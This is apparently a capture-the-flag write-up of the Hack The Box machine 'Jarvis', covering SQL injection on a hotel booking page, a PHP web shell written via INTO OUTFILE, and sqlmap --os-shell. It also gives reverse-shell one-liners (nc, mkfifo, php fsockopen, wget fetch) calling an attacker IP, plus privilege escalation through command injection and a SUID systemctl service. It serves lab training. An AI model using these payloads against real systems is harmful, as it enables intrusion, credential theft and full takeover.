Linux Boxes

jarvis

  1. nmapAutomator
  2. gobuster
  3. initial foothold
    1. manual sqlinjection (Blind SQL injection)
      1. Error based Blind SQL Injection
      2. revshell.php
      3. Exploit the SQL injection to add php code into a file on the system
      4. reverse shell
    2. sqlmap
      1. sqlmap --os-shell
  4. privesc to pepper
    1. simpler.py
      1. ping method
    2. simpler.py privesc
  5. privesc to root
    1. linEnum.sh
      1. SUID files
    2. lse.sh
    3. system.ctl GTFO
      1. Systemctl misconfigured permissions sudo/SUID
      2. root.service
  6. user/root
  7. lessons learned

jarvis

images/1190-1.png
images/1190-2.png

nmapAutomator

images/1191-1.png
images/1191-2.png
images/1191-3.png
images/1191-4.png

22/tcp ssh
80/tcp http
64999/tcp known server

images/1191-5.png



gobuster

images/1192-1.png

initial foothold

this is the front page of our victim webserver
images/1194-1.png

navigating through home, Rooms and Dining & Bar we see

Rooms link redirects you to images/1194-2.png and naviagting to a room

we see we have 6 types of rooms and clicking the “book now” button sets cod equal to the room number

images/1194-3.png


images/1194-4.png images/1194-5.png
images/1194-6.pngimages/1194-7.png


a simple way to find out how many columns this database has is to simply increment the cod value until nothing gets returned on the webpage
images/1194-8.png
images/1194-9.png
now that we know there are only 6 entries in the database

manual sqlinjection (Blind SQL injection)

since we have reason to believe the webserver is talking to a mysql backend (hotel reservation website with hotel rooms, prices etc), we can verify our suspicions through a variety of different Blind SQL injections and see how the webserver responds


first ,we can check whether or not the sql query has valid imput sanitation/vallidation by adding a single quote ' to see if the sql query breaks

we know
images/1193-1.png
returns the superior family room
images/1193-2.png

but if we were to add a single quote '
images/1193-3.png
ir breaks the internal sql query, meaning there is NO input validation or sanitation (through single quote escapes)
images/1193-4.png


for sql enumeration to be the most effective, it is crucial to find out how many columns the database is using for our blind SQL injection, because otherwise our injection will not output correctly if at all. Luckily enough a simple way to find out how many columns this database has is to simply increment a Union SELECT statement and see if the webpage spits out anything interesting from the backend database

to find out the exact number of colums, we'll keep adding column numbers to our mysql query until the database comes back with a non-error so
union select 1
union select 1,2
union select 1,2,3
union select 1,2,3,4
union select 1,2,3,4,5
union select 1,2,3,4,5,6
all show empty server responses
images/1193-5.png

BUT
/room.php?cod=9999 union select 1,2,3,4,5,6,7
images/1193-6.png
images/1193-7.png
bingo! because the webserver is spitting out a bunch of random outputs that make no sense, we know our webserver has issued a valid mysql statement on the database as well as the fact that the database has 7 columns

now comes the fun part!

Error based Blind SQL Injection

Error Based Database Enumeration

now that we know the correct number of database columns, we can substitute in a valid mySQL query in one of the columns! take for example the simple query
SELECT user FROM mysql.user
subbing it makes our orginal union select statement look like this:
http://10.10.10.143/room.php?cod=9999 union select 1,(SELECT user FROM mysql.user),3,4,5,6,7
images/515-1.png
images/515-2.png
and we leaked DBadmin's username!
user=DBadmin


Great! we may even be able to leak the password data as well from mysql.user with the
SELECT password FROM mysql.user
subbing it in looks like the following:
http://10.10.10.143/room.php?cod=9999 union select 1,(SELECT password FROM mysql.user),3,4,5,6,7
images/515-3.png
images/515-4.png
and we leaked DBadmin's password hash!
password=2D2B7A5E4E637B8FBA1D17F40318F277D29964D0



we can also use the group_concat() mysql function to combine different database objects to one string, enumerating/outputting their contents all at once
http://10.10.10.143/room.php?cod=9999 union select 1,(SELECT group_concat(host,user,password) FROM mysql.user),3,4,5,6,7
images/515-5.png
images/515-6.png

another mysql function we can play around with is the LOAD_FILE(<file location>) function, which is practically like a local file inclusion vulnerability we've seen before, we can leak senstitive files from our victim this way! Lets try outputting /etc/passwd

http://10.10.10.143/room.php?cod=9999 union select 1,LOAD_FILE('/etc/passwd'),3,4,5,6,7
images/515-7.png
images/515-8.png



2D2B7A5E4E637B8FBA1D17F40318F277D29964D0 lets throw this hash in crackstation
images/515-9.png
and just like that, we've leaked dbadmin's password imissyou

revshell.php

mysql is capable of executing php code when our webbrowse can adequately navigate to the URL it is located with. Lets grab pentestmonkey's php reverse shell from our machine

images/1197-1.png

and tweak its configuration to call back to attack machine ip on the port we desire
images/1197-2.png

Exploit the SQL injection to add php code into a file on the system

Third, exploit the SQL injection to add php code into a file on the system. This involves two steps: (1) add php code that downloads the reverse shell script from the attack machine and saves it in a file on the target system, and (2) save the output of the query into a PHP file using the MYSQL INTO OUTFILE statement.


9999 union select 1,(select '<?php exec(\"wget -O /var/www/html/shell.php http://10.10.14.62:5555/revshell.php\");?>'),3,4,5,6,7 INTO OUTFILE '/var/www/html/test4.php'
injecting php into the url string did not work as nicely for me as it did rana so I'm going to upload the php directly onto the server


images/1196-1.png
SELECT <?php system($_GET['c']); ?> into outfile “/var/www/html/sh3ll.php”
images/1196-2.png

now if we navigate to 10.10.10.143/sh3ll.php?c=whoami we get
images/1196-3.png
there's a way to upload this php system request through a direct sql injection as well but I haven't gotten it to work yet.
http://10.10.10.143/room.php?cod=7 UNION SELECT 1, (SELECT '<?php system($_GET["cmd"]); ?>'),3,4,5,6,7 into outfile ‘/var/www/html/test6.php’
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
NOTE: we can also inject this statement through nesting a wget call within an sql injection using the syntax discussed in the previous node, it would look like this:

http://10.10.10.143/room.php?cod=7 UNION SELECT1,(SELECT ‘<?php exec(\"wget http://10.10.14.24/revshell.php -O /var/www/html/shell.php\"); ?>'),3,4,5,6,7 into outfile '/var/www/html/test5.php'
images/1196-4.png
images/1196-5.png

images/1196-6.png
images/1196-7.png

reverse shell

taking the netcat openbsd reverseshell from payloadallthethings
images/1204-1.png
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.14.62 1337 >/tmp/f

and urlencoding it with ctrl+z a

rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%2010.10.14.62%201337%20%3E%2Ftmp%2Ff

when we send it through the shell script we've uploaded
10.10.10.143.sh3ll.php?c=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%2010.10.14.62%201337%20%3E%2Ftmp%2Ff
images/1204-2.png

we get a shell!
images/1204-3.png

this (url encoded) works too
10.10.10.143.sh3ll.php?c=php -r '$sock=fsockopen("10.10.14.62",4242);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'

sqlmap

first thing sqlmap needs is the login get request packet, so fire up burp suite and intercept this and save it to a text file request.txt

images/1195-1.png
sqlmap -v 4 --user-agent="Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0" -r request.txt

images/1195-2.png
user is DBadmin
password is imissyou

sqlmap --os-shell

sqlmap -v 4 --user-agent="Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0" --os-shell -r request.txt

images/1198-1.png

images/1198-2.png

images/1198-3.png
nc -e /bin/sh 10.10.14.62 1234
images/1198-4.png

images/1198-5.png

privesc to pepper

we see as www-data we can run simpler.py as pepper

images/1199-1.png

looking at the file we see we have read permissions:
images/1199-2.png

simpler.py

we see simpler.py is our avenue to privesc, and is a custom script that we'll have to look into for vulnerabilities
images/1200-1.png
images/1200-2.png

images/1200-3.png
images/1200-4.png







ping method

images/1201-1.png

we can use sudo -u pepper /var/www/Admin-Utilities/simpler.py -p as pepper
because of the direct user input the program plugs into os.system images/1201-2.png a command without any input validationimages/1201-3.png , we should be able to escape this method and spawn a shell by avoiding the forbidden characters & ; - ' || and |




simpler.py privesc

images/1202-1.png
$(/bin/bash) successfully avoids the forbidden characters in the program and spawn us a shell
and we're pepper!

I had some problems with this pepper shell so I used
nc -e /bin/bash 10.10.14.62 1235 to call another reverse shell back to our attacking machine that had much better functionality

privesc to root

linEnum.sh

lets start our priv esc enum with LinEnum.sh
images/1205-1.png

images/1205-2.png

images/1205-3.png

images/1205-4.png

images/1205-5.png

images/1205-6.png
-t for thorough

SUID files

images/1206-1.png

systemctl known to be an uncommon SUID binary and is exploitable for privesc purposes
images/1206-2.png



lse.sh

gonna run lse.sh here for good measure since I love it
(upload it onto our victim the same we uploaded linenum)

It Instantly shows us systemctl is an uncommon setuid binary that is our primary attack vector
images/516-1.png

we can potentially take advantage of some local cron files by overwriting/hijacking some of the files they execute, but none of them run on a frequent basis, best to stick with systemctl here,
images/516-2.png

system.ctl GTFO

googling GTFO system.ctl shows there are ways to escalate privileges with sudo privileges to system.ctl

images/1207-1.png

Systemctl misconfigured permissions sudo/SUID


images/1208-1.png


https://medium.com/@klockw3rk/privilege-escalation-leveraging-misconfigured-systemctl-permissions-bc62b0b28d49
images/1208-2.png

images/1208-3.png

bin/systemctl enable /home/~/root.service
where ~ is the directory of our compromised user pepper

root.service

The plan is to write our own root.service script that systemctl will run as root when we start its service
images/1209-1.png

we'll use the bash reverse shell here from pentestmonkey to call a reverse shell back to our attack machine
images/1209-2.png

now we start the service with systemctl
images/1209-3.png

and start it with our attack machine listening on the revshell's designated port and...
images/1209-4.png

we're root!
images/1209-5.png

user/root

images/1210-1.png
2afa36c4f05b37b34259c93551f5c44f

images/1210-2.png
d41d8cd98f00b204e9800998ecf84271

lessons learned

Check out Rana Khalil's OSCP writeups and prep at https://rana-khalil.gitbook.io/hack-the-box-oscp-preparation/

images/1979-1.png